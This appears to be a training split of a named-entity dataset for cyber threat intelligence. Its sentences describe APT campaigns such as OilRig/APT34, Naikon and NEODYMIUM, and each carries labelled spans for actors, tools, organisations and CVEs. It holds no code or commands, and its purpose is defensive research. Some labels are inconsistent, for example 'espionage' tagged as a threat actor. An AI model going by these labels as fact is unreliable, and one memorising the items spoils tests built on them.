{"text": "Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": {}, "info": {"id": "dnrti_train_001049", "source": "dnrti_train"}}
{"text": "The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: government agencies": [[76, 95]], "ORGANIZATION: civil and military organizations": [[100, 132]]}, "info": {"id": "dnrti_train_001050", "source": "dnrti_train"}}
{"text": "This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": {"THREAT_ACTOR: Naikon": [[5, 11], [84, 90]]}, "info": {"id": "dnrti_train_001052", "source": "dnrti_train"}}
{"text": "The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: government agencies": [[76, 95]], "ORGANIZATION: civil and military organizations": [[100, 132]]}, "info": {"id": "dnrti_train_001053", "source": "dnrti_train"}}
{"text": "In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": {"THREAT_ACTOR: Naikon": [[7, 13]], "TOOL: C&C server": [[25, 35]]}, "info": {"id": "dnrti_train_001055", "source": "dnrti_train"}}
{"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations .", "spans": {"THREAT_ACTOR: attackers": [[56, 65]], "TOOL: Naikon proxies": [[73, 87]]}, "info": {"id": "dnrti_train_001056", "source": "dnrti_train"}}
{"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": {"THREAT_ACTOR: Naikon": [[37, 43]]}, "info": {"id": "dnrti_train_001057", "source": "dnrti_train"}}
{"text": "Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": {}, "info": {"id": "dnrti_train_001058", "source": "dnrti_train"}}
{"text": "In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": {"THREAT_ACTOR: Naikon APT": [[87, 97]]}, "info": {"id": "dnrti_train_001059", "source": "dnrti_train"}}
{"text": "In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" .", "spans": {"THREAT_ACTOR: Naikon group": [[36, 48]], "THREAT_ACTOR: actor": [[73, 78]], "THREAT_ACTOR: Hellsing": [[93, 101]]}, "info": {"id": "dnrti_train_001060", "source": "dnrti_train"}}
{"text": "More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", "spans": {"THREAT_ACTOR: Naikon": [[54, 60]], "THREAT_ACTOR: Hellsing": [[65, 73]], "THREAT_ACTOR: Hellsing APT": [[129, 141]], "TOOL: Empire Strikes Back": [[148, 167]]}, "info": {"id": "dnrti_train_001061", "source": "dnrti_train"}}
{"text": "Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk .", "spans": {"TOOL: Truvasys": [[0, 8]], "ORGANIZATION: computer utilities": [[106, 124]], "ORGANIZATION: WinUtils": [[137, 145]], "ORGANIZATION: TrueCrypt": [[148, 157]], "ORGANIZATION: WinRAR": [[160, 166]], "ORGANIZATION: SanDisk": [[172, 179]]}, "info": {"id": "dnrti_train_001062", "source": "dnrti_train"}}
{"text": "The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Truvasys": [[25, 33]]}, "info": {"id": "dnrti_train_001064", "source": "dnrti_train"}}
{"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: CVE-2016-4117": [[50, 63]]}, "info": {"id": "dnrti_train_001066", "source": "dnrti_train"}}
{"text": "Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": {}, "info": {"id": "dnrti_train_001067", "source": "dnrti_train"}}
{"text": "In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[25, 35]], "THREAT_ACTOR: NEODYMIUM": [[40, 49]], "ORGANIZATION: specific individuals": [[94, 114]]}, "info": {"id": "dnrti_train_001068", "source": "dnrti_train"}}
{"text": "Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[12, 21]], "TOOL: Wingbird": [[136, 144]]}, "info": {"id": "dnrti_train_001069", "source": "dnrti_train"}}
{"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: zero-day exploit": [[37, 53]]}, "info": {"id": "dnrti_train_001070", "source": "dnrti_train"}}
{"text": "Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": {"TOOL: Wingbird": [[0, 8]], "THREAT_ACTOR: NEODYMIUM": [[40, 49]], "ORGANIZATION: Windows Defender ATP": [[97, 117]]}, "info": {"id": "dnrti_train_001071", "source": "dnrti_train"}}
{"text": "This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe .", "spans": {"THREAT_ACTOR: activity groups": [[27, 42]], "THREAT_ACTOR: PROMETHIUM": [[56, 66]], "THREAT_ACTOR: NEODYMIUM": [[71, 80]]}, "info": {"id": "dnrti_train_001072", "source": "dnrti_train"}}
{"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: espionage": [[67, 76]], "THREAT_ACTOR: activity groups": [[116, 131]], "ORGANIZATION: specific individuals": [[165, 185]]}, "info": {"id": "dnrti_train_001073", "source": "dnrti_train"}}
{"text": "In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[19, 29]], "THREAT_ACTOR: NEODYMIUM": [[34, 43]]}, "info": {"id": "dnrti_train_001074", "source": "dnrti_train"}}
{"text": "NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "THREAT_ACTOR: activity group": [[16, 30]], "THREAT_ACTOR: PROMETHIUM": [[43, 53]]}, "info": {"id": "dnrti_train_001075", "source": "dnrti_train"}}
{"text": "Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": {}, "info": {"id": "dnrti_train_001076", "source": "dnrti_train"}}
{"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "VULNERABILITY: CVE-2016-4117": [[35, 48]], "THREAT_ACTOR: PROMETHIUM": [[67, 77]]}, "info": {"id": "dnrti_train_001077", "source": "dnrti_train"}}
{"text": "NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "TOOL: Wingbird": [[58, 66]], "ORGANIZATION: FinFisher": [[105, 114]]}, "info": {"id": "dnrti_train_001078", "source": "dnrti_train"}}
{"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"THREAT_ACTOR: activity groups": [[39, 54]], "THREAT_ACTOR: PROMETHIUM": [[57, 67]], "THREAT_ACTOR: NEODYMIUM": [[72, 81]], "VULNERABILITY: zeroday exploit": [[140, 155]]}, "info": {"id": "dnrti_train_001079", "source": "dnrti_train"}}
{"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: BlackOasis": [[60, 70]], "ORGANIZATION: Kaspersky": [[73, 82]], "THREAT_ACTOR: group": [[93, 98]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[116, 157]], "VULNERABILITY: CVE-2016-4117": [[160, 173]], "TOOL: FinSpy": [[220, 226]]}, "info": {"id": "dnrti_train_001080", "source": "dnrti_train"}}
{"text": "FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions .", "spans": {"TOOL: FinSpy": [[0, 6]], "THREAT_ACTOR: attacker": [[50, 58]], "THREAT_ACTOR: Gamma Group": [[165, 176]], "ORGANIZATION: FinFisher": [[217, 226]]}, "info": {"id": "dnrti_train_001081", "source": "dnrti_train"}}
{"text": "In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": {"THREAT_ACTOR: BlackOasis": [[14, 24]]}, "info": {"id": "dnrti_train_001082", "source": "dnrti_train"}}
{"text": "BlackOasis in recent months sent a wave of phishing emails .", "spans": {"THREAT_ACTOR: BlackOasis": [[0, 10]]}, "info": {"id": "dnrti_train_001083", "source": "dnrti_train"}}
{"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]]}, "info": {"id": "dnrti_train_001084", "source": "dnrti_train"}}
{"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "THREAT_ACTOR: Neodymium": [[44, 53]], "THREAT_ACTOR: activity groups": [[93, 108]], "THREAT_ACTOR: PROMETHIUM": [[188, 198]], "THREAT_ACTOR: NEODYMIUM": [[203, 212]]}, "info": {"id": "dnrti_train_001085", "source": "dnrti_train"}}
{"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]], "VULNERABILITY: zero-day exploit": [[52, 68]], "THREAT_ACTOR: BlackOasis": [[77, 87]]}, "info": {"id": "dnrti_train_001086", "source": "dnrti_train"}}
{"text": "Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": {"THREAT_ACTOR: BlackOasis": [[11, 21]]}, "info": {"id": "dnrti_train_001087", "source": "dnrti_train"}}
{"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"THREAT_ACTOR: activity groups": [[12, 27]], "THREAT_ACTOR: PROMETHIUM": [[107, 117]], "THREAT_ACTOR: NEODYMIUM": [[122, 131]]}, "info": {"id": "dnrti_train_001088", "source": "dnrti_train"}}
{"text": "A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": {"THREAT_ACTOR: BlackOasis": [[20, 30]], "THREAT_ACTOR: group": [[95, 100]]}, "info": {"id": "dnrti_train_001089", "source": "dnrti_train"}}
{"text": "Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis": [[33, 43]]}, "info": {"id": "dnrti_train_001090", "source": "dnrti_train"}}
{"text": "All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements .", "spans": {"ORGANIZATION: Kaspersky": [[23, 32]]}, "info": {"id": "dnrti_train_001091", "source": "dnrti_train"}}
{"text": "The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": {"ORGANIZATION: McAfee": [[32, 38]], "ORGANIZATION: WikiLeaks": [[79, 88]]}, "info": {"id": "dnrti_train_001092", "source": "dnrti_train"}}
{"text": "We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China .", "spans": {"THREAT_ACTOR: Night Dragon—as": [[121, 136]]}, "info": {"id": "dnrti_train_001095", "source": "dnrti_train"}}
{"text": "Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: petrochemical companies": [[210, 233]], "ORGANIZATION: executives": [[263, 273]]}, "info": {"id": "dnrti_train_001096", "source": "dnrti_train"}}
{"text": "The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": {"THREAT_ACTOR: Night Dragon": [[42, 54]], "TOOL: RAT tools": [[138, 147]], "THREAT_ACTOR: attacker": [[213, 221]]}, "info": {"id": "dnrti_train_001098", "source": "dnrti_train"}}
{"text": "While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry .", "spans": {"ORGANIZATION: energy sector": [[55, 68]]}, "info": {"id": "dnrti_train_001099", "source": "dnrti_train"}}
{"text": "In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums .", "spans": {"THREAT_ACTOR: attackers": [[18, 27]]}, "info": {"id": "dnrti_train_001100", "source": "dnrti_train"}}
{"text": "We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": {"THREAT_ACTOR: actors": [[91, 97]], "ORGANIZATION: Unit 42": [[154, 161]]}, "info": {"id": "dnrti_train_001101", "source": "dnrti_train"}}
{"text": "Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": {"THREAT_ACTOR: actors": [[39, 45]], "TOOL: Clayslide delivery documents": [[76, 104]]}, "info": {"id": "dnrti_train_001102", "source": "dnrti_train"}}
{"text": "We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": {"TOOL: Clayslide samples": [[25, 42]], "THREAT_ACTOR: OilRig actor": [[80, 92]]}, "info": {"id": "dnrti_train_001103", "source": "dnrti_train"}}
{"text": "On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": {"THREAT_ACTOR: actor": [[27, 32]], "TOOL: Clayslide delivery documents": [[82, 110]]}, "info": {"id": "dnrti_train_001104", "source": "dnrti_train"}}
{"text": "The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": {"THREAT_ACTOR: actor": [[4, 9]]}, "info": {"id": "dnrti_train_001105", "source": "dnrti_train"}}
{"text": "In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": {"THREAT_ACTOR: actor": [[91, 96]]}, "info": {"id": "dnrti_train_001106", "source": "dnrti_train"}}
{"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]]}, "info": {"id": "dnrti_train_001107", "source": "dnrti_train"}}
{"text": "This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": {"THREAT_ACTOR: OilRig": [[35, 41]], "THREAT_ACTOR: threat group": [[42, 54]], "TOOL: delivery documents": [[82, 100]]}, "info": {"id": "dnrti_train_001108", "source": "dnrti_train"}}
{"text": "Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": {"THREAT_ACTOR: OilRig": [[21, 27]]}, "info": {"id": "dnrti_train_001109", "source": "dnrti_train"}}
{"text": "In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": {"TOOL: VPN Web Portal": [[37, 51]], "ORGANIZATION: IT vendors": [[87, 97]], "ORGANIZATION: financial institutes": [[108, 128]], "ORGANIZATION: Israeli Post Office": [[139, 158]]}, "info": {"id": "dnrti_train_001110", "source": "dnrti_train"}}
{"text": "In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": {"TOOL: stolen code signing certificate": [[86, 117]]}, "info": {"id": "dnrti_train_001111", "source": "dnrti_train"}}
{"text": "In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": {"ORGANIZATION: Symantec": [[19, 27]], "THREAT_ACTOR: attack groups": [[68, 81]], "THREAT_ACTOR: Cadelle": [[112, 119]], "THREAT_ACTOR: Chafer": [[124, 130]], "TOOL: Backdoor.Cadelspy": [[156, 173]], "TOOL: Backdoor.Remexi": [[178, 193]]}, "info": {"id": "dnrti_train_001112", "source": "dnrti_train"}}
{"text": "In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": {"ORGANIZATION: Unit 42": [[14, 21]], "THREAT_ACTOR: OilRig": [[42, 48]], "ORGANIZATION: financial institutions": [[70, 92]], "ORGANIZATION: technology organizations": [[97, 121]]}, "info": {"id": "dnrti_train_001113", "source": "dnrti_train"}}
{"text": "In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": {"THREAT_ACTOR: threat actors": [[31, 44]], "ORGANIZATION: legitimate service providers": [[59, 87]]}, "info": {"id": "dnrti_train_001114", "source": "dnrti_train"}}
{"text": "The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": {"TOOL: Helminth": [[78, 86]]}, "info": {"id": "dnrti_train_001115", "source": "dnrti_train"}}
{"text": "Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": {}, "info": {"id": "dnrti_train_001116", "source": "dnrti_train"}}
{"text": "In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": {"ORGANIZATION: Unit 42": [[14, 21]], "ORGANIZATION: financial organizations": [[149, 172]]}, "info": {"id": "dnrti_train_001117", "source": "dnrti_train"}}
{"text": "Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": {"TOOL: Helminth backdoor": [[90, 107]]}, "info": {"id": "dnrti_train_001118", "source": "dnrti_train"}}
{"text": "FireEye also reported on these attacks in a May 22 blog post .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "dnrti_train_001119", "source": "dnrti_train"}}
{"text": "The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": {"TOOL: Helminth": [[26, 34]], "TOOL: dropper Trojan": [[55, 69]], "TOOL: HerHer Trojan": [[98, 111]]}, "info": {"id": "dnrti_train_001120", "source": "dnrti_train"}}
{"text": "The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": {"TOOL: Helminth": [[4, 12]], "TOOL: HTTP": [[153, 157]], "TOOL: DNS": [[162, 165]]}, "info": {"id": "dnrti_train_001121", "source": "dnrti_train"}}
{"text": "Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": {"TOOL: Helminth": [[0, 8]]}, "info": {"id": "dnrti_train_001122", "source": "dnrti_train"}}
{"text": "This suggests that the threat actors are not only focused on financial organizations , as their target set could include other industries as well .", "spans": {"THREAT_ACTOR: threat actors": [[23, 36]], "ORGANIZATION: financial organizations": [[61, 84]]}, "info": {"id": "dnrti_train_001125", "source": "dnrti_train"}}
{"text": "The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": {}, "info": {"id": "dnrti_train_001126", "source": "dnrti_train"}}
{"text": "The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": {"ORGANIZATION: email provider": [[92, 106]]}, "info": {"id": "dnrti_train_001127", "source": "dnrti_train"}}
{"text": "The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": {}, "info": {"id": "dnrti_train_001128", "source": "dnrti_train"}}
{"text": "While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": {"THREAT_ACTOR: group": [[125, 130]], "THREAT_ACTOR: threat actors": [[134, 147]]}, "info": {"id": "dnrti_train_001129", "source": "dnrti_train"}}
{"text": "The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": {"TOOL: Helminth": [[20, 28]]}, "info": {"id": "dnrti_train_001130", "source": "dnrti_train"}}
{"text": "Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", "spans": {"THREAT_ACTOR: group": [[106, 111]]}, "info": {"id": "dnrti_train_001131", "source": "dnrti_train"}}
{"text": "Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": {"THREAT_ACTOR: group": [[59, 64]], "ORGANIZATION: government organizations": [[166, 190]]}, "info": {"id": "dnrti_train_001132", "source": "dnrti_train"}}
{"text": "The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_001133", "source": "dnrti_train"}}
{"text": "In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": {"ORGANIZATION: Qatari organizations": [[42, 62]], "TOOL: Helminth samples": [[115, 131]]}, "info": {"id": "dnrti_train_001134", "source": "dnrti_train"}}
{"text": "While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": {}, "info": {"id": "dnrti_train_001135", "source": "dnrti_train"}}
{"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"ORGANIZATION: Microsoft": [[23, 32]], "VULNERABILITY: CVE-2017-11882": [[52, 66]], "ORGANIZATION: FireEye": [[87, 94]], "THREAT_ACTOR: attacker": [[107, 115]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "ORGANIZATION: government organization": [[184, 207]]}, "info": {"id": "dnrti_train_001136", "source": "dnrti_train"}}
{"text": "We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": {"THREAT_ACTOR: cyber espionage threat group": [[63, 91]], "THREAT_ACTOR: APT34": [[114, 119]], "TOOL: custom PowerShell backdoor": [[130, 156]]}, "info": {"id": "dnrti_train_001137", "source": "dnrti_train"}}
{"text": "We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"THREAT_ACTOR: APT34": [[15, 20]]}, "info": {"id": "dnrti_train_001139", "source": "dnrti_train"}}
{"text": "APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[99, 119]]}, "info": {"id": "dnrti_train_001140", "source": "dnrti_train"}}
{"text": "We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"THREAT_ACTOR: APT34": [[11, 16]]}, "info": {"id": "dnrti_train_001141", "source": "dnrti_train"}}
{"text": "In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": {"TOOL: POWBAT malware": [[162, 176]]}, "info": {"id": "dnrti_train_001142", "source": "dnrti_train"}}
{"text": "In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": {"THREAT_ACTOR: APT34": [[27, 32]], "TOOL: PowerShell-based backdoor": [[78, 103]], "TOOL: POWRUNER": [[117, 125]], "TOOL: BONDUPDATER": [[203, 214]]}, "info": {"id": "dnrti_train_001143", "source": "dnrti_train"}}
{"text": "APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "THREAT_ACTOR: group": [[58, 63]], "THREAT_ACTOR: OilRig": [[66, 72]]}, "info": {"id": "dnrti_train_001144", "source": "dnrti_train"}}
{"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"THREAT_ACTOR: APT34": [[26, 31]], "VULNERABILITY: Microsoft Office vulnerability": [[53, 83]], "VULNERABILITY: CVE-2017-11882": [[84, 98]], "TOOL: POWRUNER": [[109, 117]], "TOOL: BONDUPDATER": [[122, 133]]}, "info": {"id": "dnrti_train_001146", "source": "dnrti_train"}}
{"text": "The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": {"ORGANIZATION: Microsoft": [[33, 42]]}, "info": {"id": "dnrti_train_001147", "source": "dnrti_train"}}
{"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]]}, "info": {"id": "dnrti_train_001148", "source": "dnrti_train"}}
{"text": "During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"THREAT_ACTOR: APT34": [[29, 34]], "VULNERABILITY: CVE-2017-0199": [[125, 138]], "VULNERABILITY: CVE-2017-11882": [[143, 157]]}, "info": {"id": "dnrti_train_001149", "source": "dnrti_train"}}
{"text": "The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "THREAT_ACTOR: APT34": [[23, 28]], "THREAT_ACTOR: Helix Kitten": [[31, 43]], "THREAT_ACTOR: espionage": [[75, 84]]}, "info": {"id": "dnrti_train_001150", "source": "dnrti_train"}}
{"text": "We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": {"THREAT_ACTOR: APT34": [[10, 15]]}, "info": {"id": "dnrti_train_001151", "source": "dnrti_train"}}
{"text": "We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": {"THREAT_ACTOR: group": [[25, 30]]}, "info": {"id": "dnrti_train_001153", "source": "dnrti_train"}}
{"text": "Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: OilRig group": [[69, 81]], "ORGANIZATION: government agency": [[112, 129]]}, "info": {"id": "dnrti_train_001154", "source": "dnrti_train"}}
{"text": "The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": {"TOOL: script-based backdoors": [[11, 33]], "THREAT_ACTOR: OilRig group": [[68, 80]]}, "info": {"id": "dnrti_train_001155", "source": "dnrti_train"}}
{"text": "The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": {"TOOL: PowerShell backdoor": [[24, 43]], "TOOL: QUADAGENT": [[51, 60]], "THREAT_ACTOR: OilRig group": [[88, 100]], "ORGANIZATION: ClearSky Cyber Security": [[109, 132]], "ORGANIZATION: FireEye": [[137, 144]]}, "info": {"id": "dnrti_train_001156", "source": "dnrti_train"}}
